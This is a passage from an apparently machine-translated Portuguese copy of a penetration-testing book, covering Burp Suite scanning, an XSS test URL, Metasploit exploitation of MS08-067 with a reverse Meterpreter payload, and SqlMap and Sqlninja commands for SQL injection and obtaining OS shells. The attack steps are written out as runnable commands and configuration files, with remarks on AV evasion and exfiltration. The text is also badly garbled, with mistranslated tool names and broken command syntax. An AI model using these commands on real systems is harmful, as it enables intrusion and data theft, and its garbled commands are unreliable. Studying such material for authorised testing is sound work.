em formação. Por padrão, o estado inicial é interceptar todo o tráfego. Intercept significa parar quaisquer pedidos
a partir do navegador para o aplicativo web, dar­lhe a capacidade de ler ou modificar esse pedido, e quer
transmitirá esse pedido à aplicação web ou deixar cair esse pedido.
Se você tentar navegar para sites com a configuração padrão, você não será capaz de ver todas as respostas até
você desliga o botão "Intercept". Ao clicar no botão "Intercept" off, ainda estará capturando tudo
o tráfego na web, mas não será adulteração diretamente com cada solicitação. Uma vez em um estado de intercepção fora,
você pode ver todas as solicitações e respostas na guia Histórico à direita do Intercept.
Agora, se nós vá para a guia Target, podemos ver a URL que tinha acabado preso e encaminhado. Vamos primeiro
adicionar este site ao nosso escopo. Âmbito define onde poderia ocorrer spidering automatizada e testes e ajuda
você não verifica ativamente domínios que estão fora de seu alcance. Vamos para este um pouco mais tarde, mas você
deve adicionar todos os URLs ou FQDNs que você deseja testar no seu âmbito de aplicação. A imagem abaixo mostra o testador
botão direito do mouse no domínio e clique em "Adicionar ao escopo".
Figura 18 ­ Criar o seu escopo
aranha Aplicação
A primeira coisa a fazer para testes de aplicações web é a aranha do hospedeiro. Isto significa que Burp irá rastrear
através de todo o site e registro de todos os arquivos diferentes, formas e métodos HTTP do site. Nós
Aranha em primeiro lugar porque precisamos identificar onde todas as ligações são, quais os tipos de parâmetros são usados ​​em
a aplicação, o que locais as referências de aplicação, para que o layout geral de como o externo
funções do aplicativo.
Para aranha seu aplicativo, cair na guia Target, guia mapa do site, clique direito sobre o domínio que você deseja
a aranha, e clicar em "Spider este alojamento".
Figura 19 ­ Spidering a Hóstia
Uma vez que o processo de spidering estiver concluída, arroto deve ter um bom layout do exatamente o que o
aplicação parece. Também pode clicar em qualquer arquivo (imagem abaixo) para ver o que o pedido foi e
que a resposta era. Na coluna à esquerda, vemos todos os arquivos e pastas e na mão direita
lado vemos os pedidos e respostas. Logo abaixo da guia mapa do site é o botão Filter. tente tocar
por aí com isso para ver o que você está filtrando eo que funciona para você. Geralmente, eu gostaria de adicionar primeiro
todos os meus domínios para escopoe, em seguida, clique no filtro para mostrar apenas aqueles que estão no escopo. Ele acaba
limpar um monte de domínios referenciados que estão fora do escopo em meus testes de qualquer maneira.
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 27/115
Figura 20 ­ Mapa do Site / solicitação e as respostas
Descubra conteúdo
Há momentos em que as páginas ou pastas não estão directamente ligadas a partir de uma aplicação web. Por exemplo,
muitas vezes eu vi que a pasta de administrador ou página de login não são referenciados em qualquer lugar no site. você pode
ver que na barra do navegador que você vá para o diretório / pasta / admin e você é levado para a autenticação de administrador
página, mas isso pode ter sido perdidas durante a fase de spider. Isso geralmente é porque o host
administradores estão tentando esconder essas pastas e páginas de login administrativos de usuários em geral.
Estes são os tipos exatos de coisas que você está procurando em um teste, de modo que você pode tentar contornar ou bruta
forçar o processo de autenticação.
Existe um módulo específico dentro arroto que é extremamente útil para esses cenários. Dentro da mesma
Guia Site mapa, você clique direito sobre o URL pai, desça para as "ferramentas de engajamento", e clique em
"Conteúdo Discover".
Figura 21 ­ Descobrindo conteúdo
Uma vez dentro do módulo de Descoberta, você pode clicar no "sessão não está em execução" botão eo
aplicação começará "brute inteligente forçando" pastas e estruturas de arquivos. Quando eu digo "brute inteligente
forçando ", quero dizer a aplicação aprende a partir de arquivos e pastas que encontra dentro do aplicativo e tenta
para fazer melhores escolhas para a força bruta. Esta técnica proporciona um processo eficiente para identificar
pastas e arquivos para promover o seu teste de aplicativos.
Antes de mostrar o exemplo, note que existem listas de palavras personalizadas que preferem usar durante a minha própria
avaliações. Eu não tenho certeza se JANGADA ainda está sendo desenvolvido ativamente, mas de alguns anos para trás um par
caras fizeram uma palestra sobre desenvolvimento de melhores listas de pastas e arquivos mais comuns. Eles têm muitas
diferentes listas que você deve olhar com base em seu escopo e janelas de testes. Estas listas podem ser
encontrada aqui: http://code.google.com/p/raft/source/browse/trunk/data/wordlists/?r=64.
Figura 22 ­ Descobrir Estado Sessão
Como você pode ver na imagem acima, a ferramenta de descoberta identificou o / wp­includes / pasta que é
comum para aplicações WordPress. Em seguida, ele começa a procurar pasta comum / tipos de arquivos dentro desse
pasta. Você pode clicar na guia mapa do site no topo do módulo de Descoberta e ver todos os resultados
a partir dessa verificação. Isso ajudará a identificar rapidamente as pastas ocultas, páginas de administração, páginas de configuração e
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 28/115
outras páginas que serão úteis para um testador.
Executando o Scanner Ativo
Uma vez que você se sinta confortável que você identificou uma porção adequada do site, você pode começar
atacando os parâmetros, pedidos, e à procura de vulnerabilidades. Isso pode ser feito clicando com o botão direito
no domínio pai e caindo para "ativamente examinar esse host" (imagem abaixo). Isso vai chutar
off scanner de aplicação do arroto e começar fuzzing parâmetros de entrada. Lembre­se, este vai ser
extremamente alto na rede e pode enviar consultas extensas na aplicação. Um aviso rápido,
se o aplicativo tem uma caixa de comentário, o cliente pode receber uma quantidade excessiva de e­mails de
todos os parâmetros que estão sendo ativamente fuzzed. Este é sempre por isso que é importante deixar o seu cliente saber
quando e de onde o testador será a execução dessas tarefas.
Figura 23 ­ varreduras de vulnerabilidades do Active
Uma vez que o scanner está sendo executado, a fila de resultados e testes estará localizado na guia "Scanner". Vocês
pode querer olhar para a guia Opções da guia Scanner para configurar ainda mais Burp Suite. Um
mudança que eu geralmente fazem para diminuir os tempos de varreduras é aumentar o número de threads no Active
seção Scan Engine. Isto irá fazer uma diferença significativa na quantidade de tempo que é necessário, mas
ter cuidado, pois você pode derrubar um pequeno site, se a contagem da linha é muito alto.
Se dermos uma olhada nos resultados, vemos que arroto Suite encontrou uma vulnerabilidade de XSS para este site.
Arroto nos disse exatamente qual era o problema, o pedido de repeti­la, e a resposta.
Figura 24 ­ Resultados da Verificação
Sendo um testador de penetração, você precisa verificar se você não tem nenhum falsos positivos e identificar
a gravidade real da descoberta. Vamos ver se o arroto tinha encontrado era realmente válido. Clicando em um
das vulnerabilidades XSS, podemos ver o parâmetro GET exato que foi utilizado. Para replicar este problema,
teríamos de ir e visitar:
www.securepla.net/xss_example/example.php?alert=9228a<script>alert(1)</script>281717daa8d.
Abertura de um navegador e digitando o URL, o seguinte demonstra que este não é um falso positivo,
mas uma vulnerabilidade real. Se você não estiver familiarizado com ataques XSS, eu passar algum tempo brincando com uma
vulnerável rede aplicação estrutura gostar WebGoat:
https://www.owasp.org/index.php/Category:OWASP_WebGoat_Project.
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 29/115
Figura 25 ­ Exemplo XSS
Arroto vai fazer muito mais do que apenas verificar se há vulnerabilidades XSS. Ele pode identificar problemas CSRF, mau SSL
certs, vulnerabilidades de passagem de diretório, injeções SQL, injeções de comando, e muito mais. Ver
mais usos de arroto, vá para a seção neste livro sobre Web Application pentesting.
A digitalização da rede é um passo importante para um teste de penetração em toda a rede bem sucedida. Com um tal
grande alcance, tanto a digitalização passiva e ativa pode fornecer informações sobre a rede, serviços,
aplicativos, vulnerabilidades e anfitriões. Usando varreduras de portas especializadas ou personalizados, web scraping,
"Brute inteligente forçando", e ferramentas automatizadas podem ajudar a aumentar a eficiência ea eficácia da
o teste. Estas descobertas levará diretamente para as próximas seções de vulnerabilidades que exploram
identificados por este processo.
O conceito da unidade é que você ver o buraco aberto ou vulnerabilidade e cabe a você romper.
Há muitos tipos diferentes de vulnerabilidades identificadas a partir de um scanner, mas eu vou passar por cima de dois dos
formas padronizadas para explorar vulnerabilidades comuns. Esta secção vai ser mais de um nível elevado
ver, porque se eu fosse para se concentrar em cada tipo de vulnerabilidade este livro se tornaria extremamente
grandes. Este livro também está supondo que você tenha alguma experiência com a exploração e isso deve
espero ser apenas uma reciclagem.
Se você usa Nexpose ou Nessus (ou qualquer outro scanner de vulnerabilidade), pode não fazer uma
diferença no processo de exploração. Uma vez que um scanner encontra uma vulnerabilidade, eu normalmente irá procurar
um trabalho explorar. Tenho dedicado uma seção nos capítulos posteriores sobre busca Vulnerabilidade e
como encontrar exploits baseados em resultados de um scanner, mas por agora vou descrever brevemente como usar
Metasploit e a importância de compreender scripts para explorar suas vulnerabilidades.
(Http://www.metasploit.com)(Windows / Linux Kali)
A ferramenta exploradora mais comum que todos nós já utilizado é Metasploit. O Metasploit Framework é
projetada para desenvolver, explorar e favorecer ataques. A melhor parte do quadro é que ele
foi desenvolvido com a pesquisa em mente. Com isto quero dizer que é muito fácil de desenvolver o seu próprio
Módulos Metasploit e utilizá­los no quadro. 5 Não é preciso muito conhecimento Ruby,
mas mais habilidades de scripts básicos. Sem gastar muito tempo explicando Metasploit, vamos andar
através de um exemplo usando a estrutura.
Escolha um exploit ou módulo de usar
Defina as opções para o módulo
o O comando "conjunto" é usado para os valores de entrada para a configuração do módulo
o Definir os anfitriões vítima e portos
o Defina seus anfitriões e portas locais
o Possivelmente definir as versões de sistema, contas de usuário e outras informações
o Emita o comando 'Mostrar opções' para ver quais opções são exigidas ou necessárias
Configurando cargas
O Payloads são o que deve acontecer após a vulnerabilidade é explorada
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 30/115
o Para obter uma melhor compreensão dos tipos de cargas úteis avaliação: http: //www.offensive­
security.com/metasploit­unleashed/Payload_Types
o Emita o comando 'show payloads' para ver todos os diferentes tipos
o Utilize as 'cargas SET' para configurar quais payload de usar
Definir Codificadores
o Este é o caminho fundamental para ofuscar o ataque no Metasploit. Infelizmente, isso ainda muitas vezes desencadeia em
AV e não é confiável para testes de penetração. Discutiremos mais tarde no livro melhores formas de
como burlar AV.
O para ver cargas úteis, emitir o comando "mostrar encoders 'e aplicá­los através dos codificadores Definir'
comando
Definir opções adicionais
Executando o ataque selecionado e configurado emitir o comando 'explorar'
Desde que eu costumo usar a versão CLI do Metasploit, é difícil lembrar de todos os diferentes tipos de
comandos. Aqui está uma folha de fraude rápido para ajudar: http://www.cheatography.com/huntereight/cheat­
folhas / metasploit­4­5­0­dev­15713 /. É claro que você pode sempre digitar "ajuda" dentro do aplicativo para
ajuda adicional.
Eu sei que a vulnerabilidade MS08­067 é extremamente antiga, mas não só eu ainda encontrá­los
vulnerabilidades de vez em quando, o ataque é extremamente estável em relação a outros ataques remotos. Para
aqueles que nunca usaram tentou a vulnerabilidade MS08­067, eu recomendo a criação de um laboratório
com um sistema sem correção velho Windows XP e tentar este exemplo exato. Se você é um especialista MS08­
067'er, você pode ignorar a seção curta.
Caindo em Metasploit na Kali
o Abra um terminal e digite: msfconsole
Para procurar uma vulnerabilidade, digite:
o procurar MS08­067
Figura 26 ­ MS08­067 Metasploit Exemplo
Para explorar o sistema via a vulnerabilidade MS08­067:
Seleccione a exploração dos resultados da pesquisa, digite:
o uso Exploit / windows / SMB / ms08_067_netapi
Veja opções necessárias para o tipo de exploração para trabalhar,:
Opções o Mostrar
Definir informações IP, digite:
o set RHOST [IP de acolhimento vulneráveis ​​do Windows]
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 31/115
o set LHOST [IP da sua máquina]
Selecionar quais cargas úteis e um codificador de usar, tipo
janelas o set PAYLOAD / meterpreter / reverse_tcp
o conjunto ENCODER x86 / shikata_ga_nai
Executar o ataque, digite:
o exploit
Figura 27 ­ Exemplo MS08­067
Na seção Evading AV, eu vou lhe mostrar como criar Meterpreter payloads TCP reversa que irão receber
em torno de detecção AV. Não mais usando Shikata ga nai e esperando que AV não vai pegar a carga útil.
Há um número incontável de vezes em que eu descobri exploits para vulnerabilidades que não estavam em
Metasploit. Normalmente procura de vulnerabilidades com base em números de versão da bandeira agarrando
roteiro, eu vou encontrar exploits em outros lugares (encontrar Exploits seção). Uma grande parte do tempo, os scripts / code
será escrito em Python, C ++, Ruby, Perl, Bash, ou algum outro tipo de linguagem de script.
Como um testador de penetração, você precisa estar familiarizado com a forma de editar, modificar, executar e compreender
independentemente do idioma e ser capaz de entender por que uma obra explorar. Eu não recomendo que você
sempre executar um script sem testá­lo primeiro. Tenho visto honestamente alguns scripts em fóruns e Exploit­
DB onde o código de carga útil shell realmente provoca danos ao sistema pretendido. Após as façanhas de script
a vulnerabilidade a carga exclui tudo no host vulnerável. Tenho certeza de que o seu cliente
não seria muito feliz se tudo em seu sistema host foi limpo. É por isso que você quer
deve sempre usar seu próprio código shell ou validar o código shell que está dentro do script.
Digamos que você encontrar uma versão vulnerável do WarFTP servidor em execução e você encontrar algum código (por
exemplo: http://downloads.securityfocus.com/vulnerabilities/exploits/22944.py) na internet.
Coisas que você pode precisar de entender:
Como você executar a façanha? Que língua é? Você precisa compilá­lo ou há qualquer
bibliotecas você precisa importar?
Existem quaisquer dependências necessárias para a exploração de trabalhar? Versão do Windows ou Linux? DEP
ou ASLR?
São os endereços EIP ou quaisquer outros registos ou valores de preenchimento codificado para versões específicas? Faz
eles precisam ser modificados?
Será que o exploit derrubar o serviço? Você só tem uma chance de comprometer o anfitrião?
Isto é muito importante porque você pode precisar trabalhar com o cliente ou testar uma infra­estrutura semelhante
meio Ambiente.
Aqui está um exemplo do que o script poderia ser semelhante e, se executado corretamente, pode permitir o acesso shell na
o servidor vítima.
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 32/115
Figura 28 ­ Exemplo Exploit
Mesmo com MS08­067, a exploração é de Operação do Sistema e service pack dependente. Felizmente com que
payload, ele tenta identificar o sistema operacional adequado antes de explorar o host. Um monte de as façanhas escritos em
linguagens de script não tê­los em conta e são desenvolvidos para um único tipo de sistema operacional. Isso é por que
muitas vezes você vai ver que a exploração vai conter informações sobre o sistema foi testado em. Até
dentro do mesmo sistema operacional, algo como o idioma do sistema operacional pode causar um exploit para falhar
ou causar uma negação de serviço. Por exemplo, o seguinte PCMan FTP buffer overflow explorar era
só foi testada na versão francesa do Windows 7 SP1. Isso não garante que essa exploração será
sucesso na versão Inglês.
Figura 29 ­ FTP Exploit Exemplo Script6
É por isso que eu recomendo que você entender e testar todas as suas façanhas antes de experimentá­los
qualquer máquina de produção e fazer modificações nos scripts, conforme necessário.
Esta é uma visão de base sobre tendo as conclusões a partir dos resultados do scanner e colocá­los em
açao. Estes exemplos ajudarão chumbo em forma de sistemas nos próximos capítulos explorar. ataques
e exploits não pode sempre trabalhar e é por isso que insisto que meus alunos não ser dependente ferramenta. isto
é mais importante para entender por que um ataque funciona e qual é o problema subjacente é, de modo que se uma ferramenta
não funcionar, você tem a capacidade de modificar e correçãoque explorar.
O que me ajudou a aprender como explorar computadores era tomar façanhas de sites como
http://www.exploit­db.com/remote/ e recriar ­los em um outro alto nível de scripting linguagem da minha
escolha. Desenvolver estes tipos de scripts e testá­las contra seus próprios servidores vai ajudar você a ganhar
um fundo muito mais forte na codificação e uma melhor compreensão por vulnerabilidades trabalhar. Se você é
olhando para mergulhar profundamente em explorar o desenvolvimento, eu recomendo a leitura A Shellcoder de
Handbook: http://amzn.to/19ZlgfE.
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 33/115
Neste ponto, você já avaliou suas metas, instalação das peças, e agora é hora de explorar a web
vulnerabilidades. Esta parte do livro vai mergulhar em como tirar estas conclusões a partir do seu web
scans de aplicativos e teste manual para comprometimento do sistema.
Os tópicos que cobertos para a aplicação web de teste seção será: injeção de SQL (SQLi), cruzada
site scripting (XSS), cross­site request forgery (CSRF), sessão de entropia forma, fuzzing / input
validação e lógica de negócios. Embora estes não são todos os diferentes tipos de ensaios para validar, estes
geralmente fornecem as principais descobertas que levam a uma base de usuários, aplicativo ou sistema comprometido.
Isso também lhe dará uma boa base para o aprendizado de outros tipos de ataques baseados na web.
Para uma estrutura de teste específico da aplicação mais aprofundada, contra um teste de estilo de rede, que deveria
tornar­se muito familiarizados com guia de testes da OWASP: http://bit.ly/19GkG5R ea aplicação Web
Manual do Hacker: http://amzn.to/1lxZaCv.
De tanto os resultados da verificação ou de apenas picar ao redor, você pode ser capaz de identificar alguns SQL
injecções (SQLi) vulnerabilidades. Isso é ótimo porque vulnerabilidades SQLi pode levar a uma plena
compromisso do banco de dados ou do próprio sistema. Duas ferramentas de código aberto que eu encontrei para trabalhar
na maioria das vezes são SqlMap e Sqlninja. Vamos passar pelo processo de identificação para
exploração.
Se você se deparar com uma injeção SQL encontrando em Burp Suite a partir da digitalização aplicação web anterior
seção, seria algo parecido com isso na guia resultados do scanner (Figura 30).
Figura 30 ­ Burp SQL Injection Finding
Uma grande vantagem de usar arroto é que ele dá­lhe um nível de confiança de saber se os resultados são
válidas ou potenciais falsos positivos. Neste caso (Figura 30), a confiança do arroto é "determinado" eo
parâmetros vulneráveis ​​são a senha, nome de usuário e campos User­Agent.
SqlMap (http://sqlmap.org/) (Kali Linux)
SqlMap é uma das minhas ferramentas favoritas para usar para encontrar injeções SQL, manipular consultas de banco de dados,
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 34/115
e despejar bancos de dados. Ele também tem uma funcionalidade adicional para obter um shell interativo através de uma injecção
e pode até mesmo gerar Meterpreter ou uma sessão de VNC de volta para o atacante.
Nos exemplos a seguir, vou mostrar tanto um parâmetro GET e um exemplo de parâmetro POST com
SqlMap, uma vez que eles são os tipos mais comumente identificados de SQLi. A razão de eu mostrar tanto HTTP
ataques método é que se você não tiver o pedido devidamente configurado, é muito provável que o ataque
vai falhar.
Aqui está uma olhada no arquivo de ajuda para SqlMap, pois há uma série de diferentes opções que podem ser utilizadas para
ataques SQLi: SqlMap ­h
Figura 31 ­ SqlMap Ajuda Informações
GET Parâmetro Exemplo
Nos exemplos a seguir, vamos assumir que o parâmetro GET é onde o SQLi
vulnerabilidade é localizado com o URL. Queremos testar todos os parâmetros e se certificar de que temos a certeza
que a vulnerabilidade SQLi é realmente um achado. Há um bom número de falsos positivos que eu vi
com ferramentas de scanner, por isso a validação é realmente a única forma de assegurar os resultados. Lembre­se que se
você fizer um valor não específica para testar, SqlMap irá testar todos os parâmetros por padrão.
Encontrar se um injeção SQL é válido (o resultado será a bandeira se válido):
SqlMap ­u "http://site.com/info.php?user=test&pass=test" ­b
Recuperar o nome de usuário de banco de dados:
SqlMap ­u "http://site.com/info.php?user=test&pass=test"­current­user
Shell interativo
SqlMap ­u "http://site.com/info.php?user=test&pass=test"­os­shell
Algumas dicas e truques:
Você pode precisar definir qual o tipo de banco de dados para o ataque. Se você acha que uma injeção é possível, mas
SqlMap não está encontrando o problema, tente definir as ­dbms = [tipo de banco de dados] bandeira.
Se você precisa testar um achado de injeção SQL autenticado, entrar no site através de um navegador e
agarrar a Cookie (você pode agarrá­lo em linha reta do Burp Suite). Em seguida, defina o cookie usando o ­
data = [BOLINHO] switch.
Preso? Tente o comando: SqlMap ­wizard
POST Exemplo Parâmetro
exemplos POST vão imitar injeções GET, exceto para a forma como o parâmetro vulnerável é
passado. Em vez de estar no URL, os parâmetros POST são passados ​​na seção de dados. Isto é
normalmente visto com nome de usuário e senhas que os servidores web geralmente log parâmetros GET e você
não gostaria que o servidor web para senhas de log. Além disso, há limitações de tamanho com métodos GET e
portanto, uma grande quantidade de dados serão passados ​​por parâmetros POST para aplicações maiores.
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 35/115
Encontrar se um injeção SQL é válido (o resultado será a bandeira se válido):
SqlMap ­u "http://site.com/info.php" ­data = "user = test & passar = test" ­b
Recuperar o nome de usuário de banco de dados:
SqlMap ­u "http://site.com/info.php ­data =" user = test & pass = test "pelo usuário ­current
Shell interativo
SqlMap u "http://site.com/info.php ­data =" user = test & pass = test "­os­shell
Se você é capaz de obter acesso a um os­shell, você terá acesso à linha de comando completo como o usuário do banco de dados.
No exemplo a seguir, eu era capaz de encontrar um SQLi vulneráveis, ganhar uma os­shell, e executar um ipconfig
comando.
Figura 32 ­ SqlMap Command Shell
Gostaria de passar algum tempo para se acostumar a execução de comandos SQLi diferentes e tentando diferentes
interruptores identificados no arquivo de ajuda. Se SqlMap falhar, ele pode ser a sua configuração, para certificar­se
tente usar a configuração Wizard, também.
Sqlninja (http://sqlninja.sourceforge.net/) (Kali Linux)
Sqlninja é outra ótima ferramenta de injeção SQL para fazer upload de conchas e fugir sistemas IDS de rede.
Você pode estar perguntando por que eu usaria Sqlninja se eu já se sentir confortável com SqlMap?
A partir de muitos anos de experiência, tenho visto um grande número de testes que identificam SQLi com apenas um
ferramenta ou outro. Este pode, porque como ele detecta SQLi cegos, como carregar binários, IPS
assinaturas que pode detectar uma ferramenta ou o outro, ou como eles lidam com cookies. Há muitos
diferentes variáveis ​​e é inteligente para sempre verifique o seu trabalho.
Dando uma olhada no arquivo de ajuda com a opção ­h, podemos ver toda a funcionalidade diferente Sqlninja tem.
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 36/115
Figura 33 ­ Sqlninja ajudaprincipal
O único problema que eu tive com Sqlninja, é que o arquivo de configuração é um pouco mais difícil de configurar e
Eu nunca encontrou grande ou fácil de ler a documentação. Então eu vou dar dois exemplos similares de
SqlMap.
Em Sqlninja, você precisa definir a variável vulneráveis ​​para injetar usando a __SQL2INJECT__
comando. Isso é diferente de SqlMap, onde nós não 'precisa especificar qual campo para testar
contra. Vamos passar por um par de exemplos, uma vez que deve tornar as coisas muito mais claras. antes de
pode usar Sqlninja, precisamos definir o arquivo de configuração SQL. Isto irá conter todas as informações
sobre o URL, o tipo de método HTTP, cookies de sessão, e agentes do navegador.
Deixe­me mostrar­lhe a maneira mais fácil de obter as informações necessárias para Sqlninja. Como antes, carregar
Suite Burp e virar a intercepção proxy na solicitação onde o campo vulnerável é passado. No
seguindo o exemplo, nós estamos indo para capturar as solicitações enviadas para / wfLogin.aspx e identificar o POST
os valores dos parâmetros. Isso vai ter a maior parte das informações necessárias para injeções Sqlninja, mas
ligeiras modificações terão de ser feita a partir do pedido de arroto bruto.
Vamos dar uma olhada em um dos pedidos de arroto que identificaram um potencial vulnerabilidade SQLi.
Figura 34 ­ Burp Exemplo de solicitação
Nos próximos dois exemplos, você verá como os parâmetros GET e POST mais comuns são criados.
Isto pode ser usado para qualquer outro tipo de método de HTTP, mas geralmente o POST e GET métodos irão
ser usado.
Algumas coisas a notar com o pedido Burp originais versus como ele será inserido na Sqlninja
arquivo de configuração são:
O método HTTP (GET / POST) precisa ser modificado para incluir a URL completa. Arroto está faltando o
http://site.com na frente de / wfLogin.aspx
Você tem que definir os parâmetros a fuzz, adicionando o __SQL2INJECT__string.
Às vezes, por Sqlninja você pode precisar de tentar o ataque pelo primeiro fechar o SQL vulneráveis
parâmetro. Isto pode ser feito com carrapatos, aspas ou ponto e vírgula.
GET Parâmetro Exemplo
Estamos indo para escrever o arquivo de configuração sql_get.conf para a nossa área de trabalho Kali com dois vulneráveis
parâmetros. Sqlninja tentará atacar tanto para o usuário e passar campos e tentar validar se forem
vulnerável. Para criar / modificar o arquivo de configuração em um terminal, digite:
gedit ~ / Desktop / sql_get.conf
Digite o seguinte no arquivo de configuração e salvá­lo:
­httprequest_start­
G E T http://site.com/wfLogin.aspx?
user = test '; __ SQL2INJECT __ & pass = test'; __ SQL2INJECT__HTTP / 1.0
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 37/115
Anfitrião: site.com
User­Agent: Mozilla / 5.0 (X11; U; en­US; rv: 1.7.13) Gecko / 20060418Firefox / 1.0.8
Accept: text / xml, application / xml, text / html; q = 0,9, text / plain; q = 0,8, image / png, * / *
Accept­Language: en­us, en; q = 0,7, ele; Q = 0,3
Aceitar­Charset: ISO­8859­15, utf­8; q = 0,7, *; Q = 0,7
Content­Type: application / x­www­form­urlencoded
Cookie: ASPSESSIONID = 3dkDjb3jasfwefJGd
Connection: close
­httprequest_end­
POST Exemplo Parâmetro
Um pedido POST difere de um GET no fato de que os parâmetros são passados ​​na seção de dados
em vez de ser parte da URL. Em um terminal precisamos criar o arquivo de configuração e modificar o
parâmetros para injetar. Neste exemplo, vamos injetar tanto o nome de usuário e senha:
gedit ~ / Desktop / sql_post.conf
Digite o seguinte no arquivo de configuração e salvá­lo:
­httprequest_start­
POST http://site.com/wflogin.aspx HTTP / 1.0
Anfitrião: site.com
User­Agent: Mozilla / 5.0 (X11; U; en­US; rv: 1.7.13) Gecko / 20060418 Firefox / 1.0.8
Accept: text / xml, application / xml, text / html; q = 0,9, text / plain; q = 0,8, image / png, * / *
Accept­Language: en­us, en; q = 0,7, ele; Q = 0,3
Aceitar­Charset: ISO­8859­15, utf­8; q = 0,7, *; Q = 0,7
Content­Type: application / x­www­form­urlencoded
Cookie: ASPSESSIONID = 3dkDjb3jasfwefJGd
Connection: close
username = test '; __ SQL2INJECT __ & password = test'; __ SQL2INJECT__
­httprequest_end­
executando Sqlninja
Se você usa um GET ou POST ataque método, para executar o seu ataque será o mesmo. Agora que nós
criou um arquivo de configuração, podemos usar o seguinte comando para executar Sqlninja:
sqlninja ­MT ­f sql_get.conf
A sequência de comando para executar diz Sqlninja usando o modo de teste para ver se a injecção funciona com o
arquivo de configuração que acabamos de criar. Se você tiver sorte e fazer encontrar uma injeção de SQL válido, você pode começar a
atacar a base de dados. No exemplo a seguir, vamos explorar o nosso banco de dados, encontrar a versão,
verificar para ver se estamos a conta "sa" (que tem privilégios administrativos), e ver se temos acesso
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 38/115
a um shell.
Figura 35 ­ Exemplo Sqlninja
Uma vez que temos xp_cmdshell disponíveis, queremos testar que temos acesso à linha de comando eo que
tipos de privilégios que temos. No exemplo abaixo, nós estamos explorando a vulnerabilidade e testes de SQLi
Comandos de linha de comando.
Durante este teste específico (imagem abaixo), parece que poderíamos estar executando comandos no servidor,
mas tínhamos necessidade de validar esta. A questão, porém, é após a criação de um ouvinte em um servidor que possui na
Internet, ele não olha como nós estamos vendo quaisquer ligações a partir da saída servidor comprometido.
Isso pode ser um problema se queríamos exfiltrate dados de volta para nós ou baixar malware adicional.
Uma vez que com o console de linha de comando criado por Sqlninja não mostra as respostas dos comandos,
que realmente precisamos para validar que os nossos comandos são executar com êxito.
A melhor maneira de verificar se um comando está trabalhando é colocando tcp­dump para ouvir pings em um servidor
detínhamos disponível publicamente na Internet. Ao executar comandos ping em um servidor comprometido, nós
pode facilmente validar se o nosso servidor está respondendo a pings. A razão para usar pings é porque ICMP é
geralmente permitida de saída e é menos susceptível de desencadear assinaturas IDS / IPS. Este pode ser configurado
com o seguinte comando em um servidor externo possuído pelo atacante:
tcpdump ­nnvXSs 0 C2 icmp
Este comando irá registar qualquer pings enviados para o meu servidor e eu vou ser capaz de validar que o servidor pode falar
saída e que meus comandos estão trabalhando. No meu host SQLi comprometida eu executar um ping simples
de volta para o meu servidor. Se for bem sucedido, tcpdump vai ver o pedido ICMP.
linha de comando ataques SQLi pode ser executado com o seguinte comando:
sqlninja ­f [configuration_file] mc
Como podemos ver com a imagem abaixo, eu primeiro tentou executar comandos telnet volta para o meu servidor, mas que
não teve sucesso. Eu, então, tentou iniciar comandos de ping de volta para o meu servidor, onde tcpdump foi
ouvindo. Neste caso, o meu ataque foi bem sucedido e que provou que eu poderia executar comandos completos sobre esta
hospedar, mas não tem acesso à web de volta para fora.
Na imagem abaixo, a parte superior é meus pings de registro do servidor e a imagem de fundo é o host vítima
que é vulnerável a SQLi. Embora os comandos telnet parecem falhar, os pings são bem sucedidos.
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 39/115
Figura36 ­ SqlMap Command Injection Ping
Se você chegou até aqui e você não tem certeza do que fazer a seguir, você pode saltar para a passagem lateral
Seção para ter uma idéia sobre os próximos passos. Isso deve lhe dar detalhes suficientes para ajudá­lo a começar a testar e
praticando em estruturas vulneráveis. Claro que estas são as melhores opções de cenário, onde o SQLi
funciona sem ter de configurar as definições detalhadas sobre o tipo de banco de dados, tipo SQLi cego, ou outra
questões tipo timing.
Eu não posso falar sobre vulnerabilidades de aplicativos web sem falar de Cross­Site Scripting (XSS).
